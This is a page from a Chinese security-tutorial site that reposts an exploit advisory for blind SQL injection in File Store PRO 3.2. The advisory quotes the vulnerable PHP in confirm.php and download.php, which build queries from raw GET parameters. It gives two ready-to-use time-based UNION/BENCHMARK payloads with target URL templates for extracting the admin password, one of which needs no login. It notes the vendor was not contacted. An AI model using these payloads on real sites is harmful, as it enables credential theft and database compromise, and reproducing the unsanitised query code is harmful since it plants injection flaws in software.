• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities ,其中包含vulnerabilities,vulnerabilities 翻译,input file multiple,file multiple,multiple file upload等知识点,遇到此问题的同学们可以参考下
| File Store PRO 3.2 Blind SQL Injection |
|________________________________________|


Download from: http://upoint.info/cgi/demo/fs/filestore.zip

- Need admin rights:
/confirm.php:


if(isset($_GET["folder"]) && $_GET["folder"]!="") {
$folder=$_GET["folder"];
} else {
exit("Bad Request");
}
if(isset($_GET["id"]) && $_GET["id"]!="") {
$id=$_GET["id"];
} else {
exit("Bad Request");
}

// Validate all inputs
// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/
/********************** SepedaTua ****************************/

/* Fields:
$folder
$id
*/
$search = array ('@<script[^>]*?>.*?</script>@si',
'@<[\/\!]*?[^<>]*?>@si',
'@([\r\n])[\s] @',
'@&(quot|#34);@i',
'@&(amp|#38);@i',
'@&(lt|#60);@i',
'@&(gt|#62);@i',
'@&(nbsp|#160);@i',
'@&(iexcl|#161);@i',
'@&(cent|#162);@i',
'@&(pound|#163);@i',
'@&(copy|#169);@i',
'@&#(\d );@e');

$replace = array ('',
'',
'\1',
'"',
'&',
'<',
'>',
' ',
chr(161),
chr(162),
chr(163),
chr(169),
'chr(\1)');

$ffolder = $folder;
$fid = $id;

$folder = preg_replace($search, $replace, $folder);
$id = preg_replace($search, $replace, $id);

-----

$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);
}
if($mysql->num<=0)
{
exit("Record not found");
}
</div>

POC:
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin
Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

- Don't need admin rights:
In /download.php:

if(!isset($_GET["sig"])) // direct download, no need to login
$MustLogin=1|2|4;
require_once("libs/header.php");
if(!isset($_GET["sig"])) // direct download, no need to login
$userlevel=$CurUser->getlevel();
$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
if(!$mysql->query($SQL))
{
exit($mysql->error);
}
</div>

POC:
' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin
Site:
http://site.xxx/download.php?id=[SQL]

Needs magic_quotes_gpc=off. Vendor not contacted !

--------------------------------------------------------------------

Site: http://rstcenter.com
Site: http://de-ce.net

Good luck !

--------------------------------------------------------------------
</div>

您可能想查找下面的文章:

  • File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
  • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
  • Bilboblog 2.1 Multiple Remote Vulnerabilities
  • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
  • tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
  • jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
  • Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

相关文章

  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
  • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
  • PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
  • Maian Events 2.0 Insecure Cookie Handling Vulnerability
  • Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
  • Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit
  • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Mole Group Real Estate Script
    • LoveCMS 1.6.2 Final Update Settings Remote Exploit
    • Bilboblog 2.1 Multiple Remote Vulnerabilities
    • 终端技巧 终端机常见绕过沙盘方法
    • CodeDB (list.php lang) Local File Inclusion Vulnerability
    • WS_FTP Home/Professional FTP Client Remote Format String PoC
    • e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
    • MS Internet Explorer Recordset Double Free Memory Exploit
    • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
    • AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有